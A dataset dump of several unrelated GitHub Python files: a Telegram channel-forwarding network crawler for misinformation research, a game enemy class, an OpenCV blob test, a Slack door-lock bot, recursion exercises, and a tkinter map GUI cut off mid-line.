SyncTelegramClient()\n# Configure logging\nlogging.basicConfig(filename='log.log', level=logging.DEBUG)\n\n\ndef initialize_data():\n \"\"\"Initialize the csv files. Data which was previously collected is lost.\"\"\"\n # Show 'Are you Sure?' message\n if input(\"Are you sure you want to initialize the data? All previously collected data will be lost. Please enter (y/n)\") != \"y\":\n exit()\n initialize_network()\n # Create messages directory if it does not exist\n if not os.path.exists('data/messages'):\n os.makedirs('data/messages')\n # Initialize csv files for storing Pandas dataframes\n df_chats = pd.DataFrame(columns=CHATS_COLUMNS)\n df_chats.to_csv('data/chats.csv', index=False)\n print('Initialized data')\n\ndef initialize_network():\n \"\"\"Initialize the network csv files. Data which was previously collected is lost.\"\"\"\n if input(\"Are you sure you want to initialize the network? All previously collected network data will be lost. Please enter (y/n)\") != \"y\":\n exit()\n # If the edges directory is not empty, i. e. contains old data, delete it\n if os.path.exists('data/network/edges') and not len(os.listdir('data/network/edges')) == 0:\n shutil.rmtree('data/network/edges')\n # If the graphs directory is not empty, i. e. contains old data, delete it\n if os.path.exists('data/network/graphs') and not len(os.listdir('data/network/graphs')) == 0:\n shutil.rmtree('data/network/graphs')\n # Create edges directory if it does not exist\n if not os.path.exists('data/network/edges'):\n os.makedirs('data/network/edges')\n # Create graphs directory if it does not exist\n if not os.path.exists('data/network/graphs'):\n os.makedirs('data/network/graphs')\n # Initialize csv files for storing Pandas dataframes\n df_scanned = pd.DataFrame(columns=SCANNED_COLUMNS)\n df_scanned.to_csv('data/network/scanned_log.csv', index=False)\n df_nodes = pd.DataFrame(columns=NODES_COLUMNS)\n df_nodes.to_csv('data/network/nodes.csv', index=False)\n print('Initialized network')\n\ndef add_chats_by_id(chats):\n \"\"\"\n Adds chats from the given list of ids to chats.csv.\n\n chats - A list of chat ids\n \"\"\"\n df_chats = pd.read_csv('data/chats.csv')\n stored_chat_ids = list(df_chats.iloc[:,0])\n chat_ids = [chat_id for chat_id in chats if chat_id not in stored_chat_ids]\n for chat_id in chat_ids:\n if type(chat_id) != int:\n raise TypeError('The list should contain ids as integers')\n chat_metadata = None\n try:\n chat_metadata = telethon_api.get_chat_metadata(chat_id)\n except ValueError:\n print('ValueError in chat ' + str(chat_id) + '. This probably means that the chat is not known by its id yet. You need to first retrieve it in some other way. If you know the username, use add_chat_by_username instead. See https://docs.telethon.dev/en/latest/concepts/entities.html#summary for more information.')\n df_chats.to_csv('data/chats.csv', index=False)\n return\n except ChannelPrivateError:\n print('The chat', chat_id, 'could not be added to chats.csv because it is private.')\n continue\n df_chats.loc[len(df_chats.index)] = [chat_id, chat_metadata['title'], chat_metadata['username'], chat_metadata['type'], chat_metadata['can_comment']]\n stored_chat_ids.append(chat_id)\n df_chats.to_csv('data/chats.csv', index=False)\n\ndef add_chats_by_username(chats):\n \"\"\"\n Adds chats from the given list of usernames to chats.csv.\n\n chats - A list of chat usernames\n \"\"\"\n if os.path.isfile('data/chats.csv'):\n df_chats = pd.read_csv('data/chats.csv')\n else:\n df_chats = pd.DataFrame(columns=CHATS_COLUMNS)\n already_stored_ids = list(df_chats.iloc[:,0])\n already_stored_usernames = [username.lower() for username in list(df_chats.dropna().iloc[:,2])]\n chat_usernames = [username for username in chats if username.lower() not in already_stored_usernames]\n for chat_username in tqdm(chat_usernames):\n if type(chat_username) != str:\n raise TypeError('The list should contain usernames as strings')\n try:\n # TODO: Check if chat is already stored before using api\n chat_metadata = telethon_api.get_chat_metadata(chat_username)\n except ValueError as error:\n print('The chat', chat_username, 'was not added because:', error)\n continue\n except ChannelPrivateError:\n print('The chat', chat_username, 'could not be added to chats.csv because it is private.')\n continue\n except Exception as error:\n print('The chat', chat_username, 'could not be added to chats.csv due to an error:')\n print(error)\n continue\n chat_id = chat_metadata['id']\n if chat_id not in already_stored_ids:\n df_chats.loc[len(df_chats.index)] = [chat_id, chat_metadata['title'], chat_metadata['username'], chat_metadata['type'], chat_metadata['can_comment']]\n df_chats.to_csv('data/chats.csv', index=False)\n\ndef usernames_to_ids(usernames):\n \"\"\"\n Transforms a list of usernames into a list of ids. The chats with the corresponding names must exist in chats.csv.\n\n usernames - The list of usernames that is transformed. Usernames are not case-sensitive.\n \"\"\"\n if not os.path.isfile('data/chats.csv'):\n print('chats.csv does not exist yet. You need to call initialize_data first.')\n return None\n # Read chat.csv, drop rows with missing values\n df_chats = pd.read_csv('data/chats.csv').dropna()\n # Transform username column to lower case, so that differences in upper/lower case between usernames list and stored usernames do not matter.\n df_chats['username'] = df_chats['username'].str.lower()\n df_chats = df_chats.set_index('username')\n ids = None\n # For each username in the list, try to find a corresponding entry in the stored chats, return the ids\n try:\n ids = [int(df_chats.loc[username.lower()]['id']) for username in usernames]\n except TypeError:\n print('There might be a duplicate in chats.csv.')\n print(traceback.format_exc())\n except KeyError as missing_username:\n print('The chat of username', missing_username, 'does not exist in chats.csv. You need to add it first using add_chats_by_username.')\n return ids\n\ndef set_network_seed(seed):\n \"\"\"\n Initializes the network by adding the seed chats from which to start crawling.\n\n seed - List of ids of the chats that are set as the initial nodes of the network\n \"\"\"\n df_chats = pd.read_csv('data/chats.csv').set_index('id')\n df_nodes = pd.read_csv('data/network/nodes.csv')\n if not df_nodes.empty:\n print('There is still old network data. You must call initialize_network() before setting a new network seed.')\n exit()\n for chat_id in seed:\n chat = None\n if chat_id in df_chats.index:\n chat = df_chats.loc[chat_id]\n else:\n print('The chat with id', chat_id, 'does not exist in chats.csv. You need to add it first.')\n exit()\n df_nodes.loc[len(df_nodes.index)] = [chat_id, chat['name'], 1, 0]\n df_nodes.to_csv('data/network/nodes.csv', index=False)\n print('Network seed set')\n\ndef set_network_seed_by_usernames(seed):\n \"\"\"\n Initializes the network by adding the seed chats from which to start crawling.\n\n seed - List of usernames of the chats that are set as the initial nodes of the network\n \"\"\"\n ids = usernames_to_ids(seed)\n if ids is not None:\n set_network_seed(ids)\n\ndef add_nodes(nodes_id_list):\n \"\"\"\n Adds the given nodes to the nodes.csv file. Only chats that are stored in chats.csv can be added as nodes.\n\n nodes_id_list - List of ids of the nodes to be added to the network\n \"\"\"\n df_chats = pd.read_csv('data/chats.csv').set_index('id')\n df_nodes = pd.read_csv('data/network/nodes.csv')\n for node_id in nodes_id_list:\n try:\n node_name = df_chats.loc[node_id]['name']\n df_nodes.loc[len(df_nodes.index)] = [node_id, node_name, 0, 0]\n except KeyError:\n print('Cannot add chat', node_id, 'as a node because it was not added to chats.csv.')\n df_nodes.to_csv('data/network/nodes.csv', index=False)\n\ndef add_edges(chat_id, edges):\n \"\"\"\n Adds the given edges to the edges csv file of the corresponding chat.\n\n chat_id - Id of the chat the forward edges were found in\n edges - The list of edges to be added\n \"\"\"\n df_nodes = pd.read_csv('data/network/nodes.csv').set_index('chat_id')\n edges_file_path = 'data/network/edges/'+str(chat_id)+'.csv'\n # If the chat already has an edge file, read it. Otherwise initialize an empty DataFrame.\n if os.path.isfile(edges_file_path):\n df_edges = pd.read_csv(edges_file_path)\n else:\n df_edges = pd.DataFrame(columns=EDGES_COLUMNS)\n df_edges = df_edges.set_index('message_id')\n for edge in edges:\n message_id, forwarded_from = edge\n df_edges.loc[message_id] = [forwarded_from]\n if not forwarded_from in df_nodes.index:\n df_nodes.loc[forwarded_from] = ['', 0, 0]\n df_nodes.at[forwarded_from, 'in_degree'] += 1\n df_edges.to_csv(edges_file_path)\n df_nodes.to_csv('data/network/nodes.csv')\n\ndef add_messages(chat_id, messages):\n \"\"\"\n Adds the given messages to the messages csv file of the corresponding chat.\n\n messages - List of messages to be added\n \"\"\"\n messages_file_path = 'data/messages/'+str(chat_id)+'.csv'\n # Create messages directory if it does not exist\n if not os.path.exists('data/messages'):\n os.makedirs('data/messages')\n # If the chat already has a message file, read it. Otherwise initialize an empty DataFrame.\n if os.path.isfile(messages_file_path):\n df_messages = pd.read_csv(messages_file_path)\n else:\n df_messages = pd.DataFrame(columns=MESSAGES_COLUMNS)\n df_messages = df_messages.set_index('id')\n for message in messages:\n message_id = message.id\n message_content = message.message\n message_forwarded = 1 if message.fwd_from else 0\n message_date = message.date\n message_views = message.views\n message_forwards = message.forwards\n df_messages.loc[message_id] = [message_content, message_forwarded, message_date, message_views, message_forwards]\n df_messages.to_csv(messages_file_path)\n\n\"\"\" This function does not work in Ipython \"\"\"\ndef scan_chat(nodes_in_network_id_list, chat_id, batch_size=100, offset_id=0, offset_date=None):\n \"\"\"Scans the given chat for forwarded messages from other chats in order to construct a network of chats. Stores all messages in messages.csv.\n\n Args:\n nodes_in_network_id_list: List of ids of all chats that are already part of the network.\n chat: Id of the chat that is going to be searched for forwards.\n Returns:\n new_nodes: Nodes in the network that were newly identified.\n forward_edges: a list of tuples (ch_destination ,ch_origin). This means that a message was forwarded from\n ch_origin to ch_destination.\n newest_message: the newest messages fetched from the chat in this run.\n oldest_message: the oldest message fetched from the chat in this run.\n \"\"\"\n new_nodes = []\n forward_edges = []\n total_messages = 0\n newest_message = None\n oldest_message = None\n while total_messages < batch_size:\n try:\n # Fetch the last 100 messages\n messages = telethon_api.fetch_messages(\n chat=chat_id,\n offset_id=offset_id,\n offset_date=offset_date\n )\n except ValueError:\n print('ValueError in chat', chat_id)\n break\n except Exception as e:\n print('Exception in chat', chat_id, ':', e)\n break\n if not messages:\n break\n\n add_messages(chat_id, messages)\n newest_message = messages[0]\n for m in messages:\n oldest_message = m\n # If a msg was forwarded from another chat, append it to the list\n if m.fwd_from and hasattr(m.fwd_from ,'from_id') and hasattr(m.fwd_from.from_id, 'channel_id') and m.fwd_from.from_id.channel_id != chat_id:\n forwarded_from_id = m.fwd_from.from_id.channel_id\n try:\n forward_edges.append((m.id, forwarded_from_id))\n if not telethon_api.is_private(forwarded_from_id): # Just calling is_private on a private chat causes ChannelPrivateError\n if forwarded_from_id not in new_nodes and forwarded_from_id not in nodes_in_network_id_list:\n new_nodes.append(forwarded_from_id)\n except ChannelPrivateError:\n logging.info(str(forwarded_from_id) + ' is private')\n total_messages += 1\n if total_messages >= batch_size:\n break\n offset_id = messages[len(messages) - 1].id\n\n return new_nodes, forward_edges, newest_message, oldest_message\n\ndef extend_network(iterations=1, scan_size=100, only_scan_chats=None, max_date=None, min_degree=0):\n \"\"\"\n Take nodes from the network corresponding to chats that have not been scanned yet, search for forwarded messages in these chats, use them to extend the network.\n \n The chat ids along with the ranges of messages scanned are stored in data/network/scanned_log.csv.\n The network edges are stored in data/network/edges/.csv, where the file is named after the chat the messages were forwarded to.\n Nodes are stored in data/network/nodes.csv and if they were discovered for the first time, the chat is stored in data/chats.csv\n\n iterations - The number of iterations in which the chats not scanned so far are taken from chats.csv and scanned to obtain new nodes/edges for the network\n scan_size - The number of messages that are scanned for forwards in each chat\n only_scan_chats - List of chat ids. If given, the network is only extended from these chats.\n min_degree - The minimum degree of a node from which the network is extended.\n \"\"\"\n if not os.path.isfile('data/chats.csv'):\n print('chats.csv does not exist yet. You need to call initialize_data first.')\n return\n \n if only_scan_chats != None and type(only_scan_chats[0]) != int:\n print('only_scan_chats must be a list of ids')\n return\n\n # create edges directory if it does not exist\n if not os.path.exists('data/network/edges'):\n os.makedirs('data/network/edges')\n\n offset_date = datetime.datetime(*max_date).replace(hour=23, minute=59, second=59, microsecond=999999) if max_date != None else None\n \n for i in range(iterations):\n print('Extending network: Iteration', i+1, 'of', iterations)\n # Determine which chats to scan\n df_nodes = pd.read_csv('data/network/nodes.csv')\n already_stored_nodes_id_list = list(df_nodes.iloc[:,0])\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv')\n scanned_nodes_id_list = list(df_scanned_log.iloc[:,0])\n if only_scan_chats != None:\n chats_to_scan = [chat_id for chat_id in already_stored_nodes_id_list if chat_id in only_scan_chats and chat_id not in scanned_nodes_id_list]\n else:\n chats_to_scan = [chat_id for chat_id in already_stored_nodes_id_list if chat_id not in scanned_nodes_id_list]\n df_nodes = df_nodes.set_index('chat_id')\n\n for chat_id in tqdm(chats_to_scan):\n # Prevent scanning a chat that has already been scanned. Prevent scanning a chat that has a degree of less than min_degree.\n if chat_id not in scanned_nodes_id_list and df_nodes.at[chat_id, 'in_degree'] >= min_degree:\n new_nodes_found, forward_edges, newest_message, oldest_message = scan_chat(already_stored_nodes_id_list, chat_id, batch_size=scan_size, offset_date=offset_date)\n if newest_message != None and oldest_message != None:\n # log the range of messages scanned\n scanned_nodes_id_list.append(chat_id)\n df_scanned_log.loc[len(df_scanned_log.index)] = [chat_id, newest_message.id, newest_message.date, oldest_message.id, oldest_message.date]\n df_scanned_log.to_csv('data/network/scanned_log.csv', index=False)\n # store newly discovered chats as well as nodes and edges\n add_chats_by_id(new_nodes_found)\n add_nodes(new_nodes_found)\n already_stored_nodes_id_list.extend(new_nodes_found)\n add_edges(chat_id, forward_edges)\n else:\n print('Chat', chat_id, 'contains no messages')\n scanned_nodes_id_list.append(chat_id)\n now = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).replace(microsecond=0).isoformat().replace('T', ' ')\n df_scanned_log.loc[len(df_scanned_log.index)] = [chat_id, 0, now, 0, now]\n df_scanned_log.to_csv('data/network/scanned_log.csv', index=False)\n\n\ndef extend_with_older_forwards(chat_id, scan_size=100):\n \"\"\"\n Scan the given number of messages in the chat prior to the currently oldest scanned message. Identify forwards and use them to extend the network.\n\n chat_id - Id of the chat to be scanned\n scan_size - The number of messages that are scanned for forwards in the chat\n \"\"\"\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv')\n chat_row = df_scanned_log.loc[df_scanned_log['chat_id'] == chat_id]\n if chat_row.empty:\n print('The chat with id', chat_id, 'has not been scanned yet. Therefore it cannot be extended.')\n return\n oldest_message_id = int(chat_row['oldest_message_id'])\n df_nodes = pd.read_csv('data/network/nodes.csv')\n nodes_id_list = list(df_nodes.iloc[:,0])\n new_nodes_found, forward_edges, _, oldest_message = scan_chat(\n nodes_id_list, \n chat_id, \n batch_size=scan_size, \n offset_id=oldest_message_id\n )\n if oldest_message != None:\n # If there were no older messages, oldest_message is None\n # Log the new oldest message scanned\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv').set_index('chat_id')\n df_scanned_log.at[chat_id, 'oldest_message_id'] = oldest_message.id\n df_scanned_log.to_csv('data/network/scanned_log.csv')\n # store newly discovered chats as well as nodes and edges\n add_chats_by_id(new_nodes_found)\n add_nodes(new_nodes_found)\n add_edges(chat_id, forward_edges)\n\ndef extend_all_with_older_forwards(scan_size=100):\n \"\"\"\n Scan the given number of messages in all chats in the network prior to the currently oldest scanned message in each chat. Identify forwards and use them\n to extend the network.\n\n scan_size - The number of messages that are scanned for forwards in each chat\n \"\"\"\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv')\n scanned_nodes_id_list = list(df_scanned_log.iloc[:,0])\n for chat_id in tqdm(scanned_nodes_id_list):\n extend_with_older_forwards(chat_id, scan_size)\n\ndef extend_chats_with_older_forwards(chat_ids=[], scan_size=100):\n \"\"\"\n Scan the given number of messages in all chats in the list, prior to the currently oldest scanned message in each chat. Identify forwards and use them\n to extend the network.\n\n chat_ids - Ids of the chats to be scanned\n scan_size - The number of messages that are scanned for forwards in each chat\n \"\"\"\n if len(chat_ids) > 0 and type(chat_ids[0]) != int:\n print('chat_ids must be a list of ids')\n return\n\n df_scanned_log = pd.read_csv('data/network/scanned_log.csv')\n scanned_nodes_id_list = list(df_scanned_log.iloc[:,0])\n for chat_id in tqdm(chat_ids):\n if chat_id not in scanned_nodes_id_list:\n print('The chat with id', chat_id, 'has not been scanned yet. Therefore it cannot be extended.')\n else:\n extend_with_older_forwards(chat_id, scan_size)\n\n\nif __name__ == \"__main__\":\n pass\n # add_chats_by_username(misinformation_channel_usernames)\n # initialize_network()\n # set_network_seed_by_usernames(misinformation_channel_usernames)\n # extend_network(iterations=1, scan_size=100, max_date=(2022, 2, 28), min_degree=5)\n # extend_chats_with_older_forwards(misinformation_channel_ids, scan_size=200)","repo_name":"TBiele/telegram-network-crawler","sub_path":"network_crawler.py","file_name":"network_crawler.py","file_ext":"py","file_size_in_byte":21054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37720039493","text":"import resources\nimport random\nfrom Actor import Actor\nfrom Meat import Meat\nfrom Bone import Bone\nfrom math import atan, cos, sin, pi\n\n\nclass Enemy(Actor): # This defines the Enemy Class\n\n def __init__(self, day=1, *args, **kwargs):\n super(Enemy, self).__init__(*args, **kwargs)\n self.vt = 100\n self.vMax = self.vt\n self.vu = self.vt\n self.vTheta = self.rot + 90\n self.damage = 1\n self.day = day\n if self.vTheta > 360:\n self.vTheta += -360\n\n self.health = 100\n self.dead = False\n\n self.aggroDistance = 1000\n self.attackDistance = 55\n\n self.deathImage = random.choice(resources.deadChickenImages)\n\n def attack(self, player):\n if random.randint(1, 100) < 20:\n player.health -= self.damage + self.day ** 1.1\n # print player.health\n\n def die(self):\n self.texture = self.deathImage\n self.interactable = True\n self.actions = [\"Get Meat\", \"Get Bones\"]\n self.vt = 0\n self.vx = 0\n self.vy = 0\n self.dead = True\n\n def perform_action(self, player, action):\n self.interactable = False\n self.viewable = False\n if action == \"Get Meat\":\n player.get_item(Meat(poisoned=(self.poison != 0)))\n self.interactable = False\n if action == \"Get Bones\":\n player.get_item(Bone())\n self.interactable = False\n\n def set_orientation(self, targetTheta):\n self.rot = targetTheta\n\n def stop(self):\n self.vx = 0\n self.vy = 0\n\n def moveForward(self):\n self.vx = self.vu * cos((self.rot + 90) * pi / 180)\n self.vy = self.vu * sin((self.rot + 90) * pi / 180)\n\n def check_player_distance(self, player):\n self.xDistance = player.x - self.x\n self.yDistance = player.y - self.y\n self.distance = ((self.xDistance) ** 2 + (self.yDistance) ** 2) ** (.5)\n if self.xDistance != 0:\n theta = atan(self.yDistance / self.xDistance)\n if theta < 0:\n theta += 2 * pi\n if self.xDistance < 0 and self.yDistance > 0:\n theta += -pi\n elif self.xDistance < 0 and self.yDistance < 0:\n theta += pi\n elif self.yDistance > 0:\n theta = pi / 2\n else:\n theta = 3 * pi / 2\n\n self.theta = theta * 180 / pi - 90\n\n if self.theta < 0:\n self.theta += 360\n\n def aggro(self, player):\n self.check_player_distance(player)\n if self.distance < self.aggroDistance:\n self.vTheta = self.theta + 90\n self.vu = 250 * self.vt / (self.distance ** 1.25 + 20)\n self.set_orientation(self.theta)\n if self.distance <= self.attackDistance:\n self.stop()\n self.attack(player)\n else:\n self.moveForward()\n else:\n self.stop()\n\n def update(self, dt, player):\n self.x += self.vx * dt\n self.y += self.vy * dt\n\n if self.poison != 0:\n self.health -= self.poison\n self.poisonTime -= dt\n self.rgba = (0, 1, 0, 1)\n if self.poisonTime < 0:\n self.poison = 0\n self.poisonTime = 0\n self.rgba = (1, 1, 1, 1)\n\n self.collideAngle = None\n # if self.attacking == True:\n # self.attack()\n","repo_name":"segerphilip/sofdesfinal","sub_path":"Classes/Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40366698148","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n# Read image\nim = np.load('test.npz')['olog'].astype(np.uint8)\n\nim = cv2.blur(im, (3,3))\ntmp = cv2.applyColorMap(im, cv2.COLORMAP_HOT)\n\n\n# Blob detector\nparams = cv2.SimpleBlobDetector_Params()\nparams.minThreshold = 10\nparams.maxThreshold = 255\nparams.filterByArea = False\nparams.filterByCircularity = False\nparams.minCircularity = 0.1\nparams.filterByConvexity = False\nparams.minConvexity = 0.87\nparams.filterByInertia = False\nparams.minInertiaRatio = 0.01\ndetector = cv2.SimpleBlobDetector_create(params)\nkeypoints = detector.detect(im)\nim_with_keypoints = cv2.drawKeypoints(np.zeros(np.shape(im), dtype=np.uint8), keypoints, np.array([]), (0, 255, 0), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\ncv2.imshow(\"keypoints\", im_with_keypoints)\ncv2.waitKey(0)","repo_name":"orjan1992/pySonar","sub_path":"oldTests/image_tests/blob_test.py","file_name":"blob_test.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29854589782","text":"# -*- coding: utf-8 -*-\nfrom slackbot.bot import respond_to, listen_to\nimport re\n\n# 「カギ開けて」「解錠して」等に反応するようにします\n\n\n@listen_to(u'(鍵|カギ)+.*(開|あけ|空け)+')\n@listen_to(u'(解錠)+')\n@listen_to('(open)+.*(door)+', re.IGNORECASE)\n@respond_to(u'(鍵|カギ)+.*(開|あけ|空け)+')\n@respond_to(u'(解錠)+')\n@respond_to('(open)+.*(door)+', re.IGNORECASE)\ndef openKeyOrder(message, *something):\n # if カギが閉まっていたら :\n message.reply(u'わかりました。解錠します。')\n # 命令を出したユーザ名を取得することもできます。\n userID = message.channel._client.users[message.body['user']][u'name']\n print(userID + 'さんの命令でカギを開けます')\n\n# 「鍵閉めて」「施錠」等の場合はこちら\n\n\n@listen_to(u'(鍵|カギ)+.*(閉|しめ|締め)+')\n@listen_to(u'(施錠)+')\n@listen_to('(lock)+.*(door)+', re.IGNORECASE)\n@respond_to(u'(鍵|カギ)+.*(閉|しめ|締め)+')\n@respond_to(u'(施錠)+')\n@respond_to('(lock)+.*(door)+', re.IGNORECASE)\ndef closeKeyOrder(message, *something):\n # 以下openと同じなので省略\n message.reply(u'わかりました。解錠します。')\n # 未許可なFeLiCaを許可ユーザとして追加する命令\n\n\n@listen_to(u'(許可|追加)+')\n@respond_to(u'(許可|���加)+')\ndef addUserOrder(message, *something):\n # 「」で囲まれている場合はユーザ名付きで許可する。\n m = re.search(u'「.*」', message.body['text'])\n if m:\n hit = m.group(0)\n userName = hit[1:][:-1]\n message.reply(u'わかりました。直近のインスタントユーザを「' +\n userName + u'」として追加します。有効期限は10分間です。')\n else:\n userName = 'John Doe'\n message.reply(u'わかりました。直近のインスタントユーザを追加します。有効期限は10分間です。')\n\n # 該当のFeLiCaを許可ユーザに追加する処理… userAddHandler(userName, userID)\n","repo_name":"KanNa-max/SmartLock_QR","sub_path":"code/slackbot/SlackBotPlugin.py","file_name":"SlackBotPlugin.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5867442733","text":"# 1. Write a recursive python function to print first N natural numbers.\r\n\r\ndef natural_numbers(n):\r\n if n > 0:\r\n natural_numbers(n-1)\r\n print(n, end=\" \")\r\n\r\n\r\nn = int(input(\"Enter a numer:\"))\r\nnatural_numbers(n)\r\n\r\n\r\n# 2. Write a recursive python function to print first N natural numbers in reverse order\r\ndef revrs_natural(n):\r\n\r\n if n > 0:\r\n print(n, end=\" \")\r\n revrs_natural(n - 1)\r\n\r\n\r\nn = int(input(\"Enter number:\"))\r\nrevrs_natural(n)\r\n\r\n# 3. Write a recursive python function to print first N odd natural numbers\r\ndef odd_natural(n):\r\n\r\n if n>0:\r\n odd_natural(n-1)\r\n if n % 2 != 0:\r\n print(n, end=\" \")\r\n\r\n\r\ns = int(input(\"Enter a NUmber:\"))\r\nodd_natural(s*2)\r\n\r\n\r\n# 4. Write a recursive python function to print first N odd natural numbers in reverse order\r\ndef rev_odd_natural(n):\r\n if n % 2 != 0:\r\n print(n, end=\" \")\r\n if n > 0:\r\n rev_odd_natural(n - 1)\r\n\r\n\r\ns = int(input(\"Enter a NUmber:\"))\r\nrev_odd_natural(s*2)\r\n\r\n# 5. Write a recursive python function to print first N even natural numbers.\r\ndef even_natural(n):\r\n\r\n if n>1:\r\n even_natural(n-1)\r\n if n % 2 == 0:\r\n print(n, end=\" \")\r\n\r\n\r\ns = int(input(\"Enter a NUmber:\"))\r\neven_natural(s*2)\r\n\r\n\r\n# 6. Write a recursive python function to print first N even natural numbers in reverse order.\r\ndef rev_even_natural(n):\r\n if n % 2 == 0:\r\n print(n, end=\" \")\r\n if n > 1:\r\n rev_even_natural(n - 1)\r\n\r\n\r\ns = int(input(\"Enter a Number:\"))\r\nrev_even_natural(s*2)\r\n\r\n# 7. Write a recursive python function to print squares of first N natural numbers\r\ndef natural_squares(n):\r\n if n > 1:\r\n natural_squares(n - 1)\r\n print(n**2,end=\" \")\r\n\r\n\r\ns = int(input(\"Enter a Number:\"))\r\nnatural_squares(s)\r\n\r\n# 8. Write a recursive python function to print cubes of first N natural numbers\r\ndef natural_cube(n):\r\n if n > 1:\r\n natural_cube(n - 1)\r\n print(n**3,end=\" \")\r\n\r\n\r\ns = int(input(\"Enter a Number:\"))\r\nnatural_cube(s)\r\n\r\n# 9. Write a recursive python function to print first N multiples of a given number.\r\ndef multiples(n):\r\n if n == 1:\r\n return 1\r\n s = n*multiples(n-1)\r\n return s\r\n\r\n\r\ns = int(input(\"Enter a Number:\"))\r\nprint(multiples(s))\r\n\r\n# 10. Write a recursive python function to print a number in reverse order.\r\ndef reverse(n, r):\r\n if n == 0:\r\n return r\r\n else:\r\n return reverse(n//10, r*10 + n % 10)\r\n\r\n\r\nnumber = int(input(\"Enter number: \"))\r\n\r\nreversed_number = reverse(number, 0)\r\n\r\nprint(\"Reverse of {} is {}\" .format(number, reversed_number))\r\n\r\n\r\n","repo_name":"Mohanish-ThatfatKid/PYTHON-Assignments","sub_path":"Assignment21.py","file_name":"Assignment21.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33210859678","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n' GUI components '\r\n\r\n__author__ = 'Mappy Group'\r\n\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom mapStruct import *\r\nfrom mapFile import *\r\nfrom dialog import *\r\nimport datetime\r\nimport sys\r\nsys.path.append('.\\\\icons')\r\nimport icons\r\n\r\nclass CBtn(Checkbutton):\r\n def __init__(self, master, layer):\r\n Checkbutton.__init__(self, master, text = layer.name, bg = 'LightYellow', command = self.setVisible)\r\n self.layer = layer\r\n if self.layer.onEdit:\r\n self['fg'] = 'blue'\r\n self.var = IntVar()\r\n self.var.set(1)\r\n self['variable'] = self.var\r\n self.select()\r\n self.pack(anchor = W)\r\n self.y = None\r\n self.bind('', self.sPos)\r\n self.bind('', self.ePos)\r\n\r\n def setVisible(self):\r\n if self.var.get():\r\n self.layer.setVisible(True)\r\n else:\r\n self.layer.setVisible(False)\r\n\r\n self.master.master.cv.invalidate()\r\n\r\n def sPos(self, event):\r\n self.y = event.y\r\n \r\n def ePos(self, event):\r\n d = int((event.y - self.y) / 25)\r\n if d:\r\n self.master.pMap.moveLayer(self.layer, d)\r\n\r\nclass IconButton(Button):\r\n def __init__(self, master, **kwargs):\r\n Button.__init__(self, master, **kwargs)\r\n\r\n def set_icon(self, iconname, **kwargs):\r\n tk_img = icons.get(iconname,\r\n width=kwargs.get(\"width\"),\r\n height=kwargs.get(\"height\"))\r\n self.config(image=tk_img, **kwargs)\r\n if not kwargs.get(\"anchor\"): kwargs[\"anchor\"] = \"center\"\r\n if kwargs.get(\"compound\"):\r\n def expand():\r\n self[\"width\"] += tk_img.width()\r\n self[\"height\"] += tk_img.height() / 2\r\n self.after(100, expand)\r\n self.tk_img = tk_img\r\n\r\n\r\n\r\nclass LFrm(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, master, bg = 'LightYellow')\r\n Label(self, text=\"--------------图层--------------\", bg = 'LightYellow', width = '20').pack()\r\n self.pMap = ''\r\n self.chkLayers = []\r\n\r\n def setMap(self, pMap):\r\n self.pMap = pMap\r\n \r\n def flash(self):\r\n if self.pMap == '':\r\n return\r\n \r\n for cb in self.chkLayers:\r\n cb.destroy()\r\n self.chkLayers = []\r\n for layer in self.pMap.layers:\r\n chk = CBtn(self, layer)\r\n self.chkLayers.append(chk)\r\n\r\n\r\n\r\nclass TFrm(Frame):\r\n def __init__(self, master, menubar):\r\n Frame.__init__(self, master, bg = 'LightCyan')\r\n\r\n self.open_file = IconButton(self, text = 'open file', command = menubar.openFile)\r\n self.open_file.set_icon('open.png', width = 20, height = 20)\r\n self.open_file.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.save_file = IconButton(self, text = 'save file', state = 'disabled', command = menubar.saveFile)\r\n self.save_file.set_icon('save.png', width = 20, height = 20)\r\n self.save_file.pack(side = \"left\", padx = 2, pady = 2)\r\n \r\n self.new_layer = IconButton(self, text = 'create layer', state = 'disabled', command = menubar.newLayer)\r\n self.new_layer.set_icon('create layer.png', width = 20, height = 20)\r\n self.new_layer.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.del_layer = IconButton(self, text = 'delete layer', state = 'disabled', command = menubar.delLayer)\r\n self.del_layer.set_icon('del layer.png', width = 20, height = 20)\r\n self.del_layer.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n Label(self, text = ' ', bg = 'LightCyan').pack(side = LEFT)\r\n\r\n self.pan = IconButton(self, text = 'pan', state = 'disabled', command = menubar.pan)\r\n self.pan.set_icon('pan.png', width = 20, height = 20)\r\n self.pan.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.zoom_in = IconButton(self, text = 'zoom in', state = 'disabled', command = menubar.zoomIn)\r\n self.zoom_in.set_icon('zoom in.png', width = 20, height = 20)\r\n self.zoom_in.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.zoom_out = IconButton(self, text = 'zoom out', state = 'disabled', command = menubar.zoomOut)\r\n self.zoom_out.set_icon('zoom out.png', width = 20, height = 20)\r\n self.zoom_out.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.zoom_to_global = IconButton(self, text = 'zoom to global', state = 'disabled', command = 